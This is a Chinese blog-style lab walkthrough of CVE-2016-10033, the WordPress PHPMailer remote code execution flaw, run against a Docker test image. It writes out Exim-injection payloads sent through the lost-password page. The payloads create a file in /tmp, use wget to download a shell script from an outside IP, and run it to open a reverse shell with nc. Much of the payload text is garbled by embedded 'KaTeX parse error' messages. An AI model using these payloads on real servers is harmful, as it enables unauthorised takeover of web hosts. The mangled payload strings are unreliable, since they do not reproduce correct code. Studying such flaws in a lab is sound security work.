漏洞信息

漏洞编号：CVE-2016-10033
漏洞简述：WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞，未经授权的攻击者利用该漏洞就能实现远程代码执行，针对目标服务器实现即时访问，最终导致目标应用服务器的完全陷落。
影响版本：WordPress <= 4.7.1

漏洞代码

查看主要的漏洞代码可以找到class.phpmailer.php

环境搭建

1、直接拉取镜像：
代码片段：
docker pull medicean/vulapps:w_wordpress_6
docker run -d -p 8000(该端口可随意指定):80 medicean/vulapps:w_wordpress_6

2、启动环境：

漏洞页面：/wp-login.php?action=lostpassword
打开页面;
此页面是管理员密码重置页

漏洞验证

1、打开burp进行抓包：

2、可以构造payload如下，该payload在/tmp/目录下创建1.php文件：
转换后的payload:
aa(any [email protected] -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}touch{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}tmp{substr{0}{1}{$spool_directory}}1.php}} null)

*注意：生成的文件是在docker容器中生成，因此要在docker中寻找：

可以发现1.php
3、反弹shell，可以利用curl或者wget命令下载文件，然后执行该文件，即可getshell
以下代码直接是编译过的
aa(any [email protected] -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum…{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}tmp{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}shell{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}192.168.2.109{substr{0}{1}{$spool_directory}}(1.txt)}} null)

发现shell
4、找到shell在里面填入以下内容：
ip改为自己的ip
之后先监听端口之后运行即可获得shell
aa(any [email protected] -be ${run{/bin/bash /tmp/shell}} null)
转换
aa(any [email protected] -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bash{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}tmp{substr{0}{1}{$spool_directory}}shell}} null)

利用nc：

参考链接：

https://xz.aliyun.com/t/2301
https://blog.csdn.net/csacs/article/details/86776080
本人刚入csdn 也是萌新如果哪里不对还请各位大佬多多包涵并指教谢谢